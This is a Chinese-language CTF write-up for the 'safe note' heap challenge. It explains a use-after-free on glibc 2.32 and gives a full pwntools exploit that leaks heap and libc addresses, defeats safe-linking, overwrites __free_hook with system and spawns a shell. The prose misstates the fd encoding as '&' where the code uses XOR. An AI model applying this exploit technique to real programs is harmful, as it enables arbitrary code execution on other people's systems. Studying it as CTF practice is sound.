safe note
漏洞分析
free之后未清零造成UAF漏洞
利用思路
libc版本是2.32,要注意异或加密fd,加密方式为(堆地址>>12)&申请的地址
1.创建并释放一个堆获取堆地址
2.填充tcache,利用unsorted bin泄露libc,计算出free_hook和system(show之前要edit
3.利用UAF漏洞实现任意地址写,把free_hook改成system,改fd的时候要使用2.32的加密方式进行加密
4.创建一个内容为/bin/sh的堆并将其释放
exp
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './vuln'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def add(index, size):
r.sendlineafter('>', b'1')
r.sendlineafter('Index: ' , str(index))
r.sendlineafter('Size: ', str(size))
def delete(index):
r.sendlineafter('>', b'2')
r.sendlineafter('Index: ' , str(index))
def edit(index, content):
r.sendlineafter('>', b'3')
r.sendlineafter('Index: ' , str(index))
r.sendlineafter('Content: ', content)
def show(index):
r.sendlineafter('>', b'4')
r.sendlineafter('Index: ' , str(index))
add(0, 0x90)
delete(0)
show(0)
heap = u64(r.recv(5)[-5:].ljust(8, b'\x00')) << 12
li('heap = ' + hex(heap))
for i in range(8):
add(i + 1 , 0x80)
add(9, 0x20)
add(10, 0x20)
for i in range(8):
delete(i + 1)
edit(8, '')
show(8)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 106 - 0x10
li('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./2.32-0ubuntu3.2_amd64/libc-2.32.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
li('free_hook = ' + hex(free_hook))
system = libc_base + libc.sym['system']
li('system = ' + hex(system))
li('heap = ' + hex(heap))
delete(9)
delete(10)
edit(10, p64((heap>>12) ^ free_hook))
add(11, 0x20)
edit(11, b'/bin/sh\x00')
add(12, 0x20)
edit(12, p64(system))
delete(11)
r.interactive()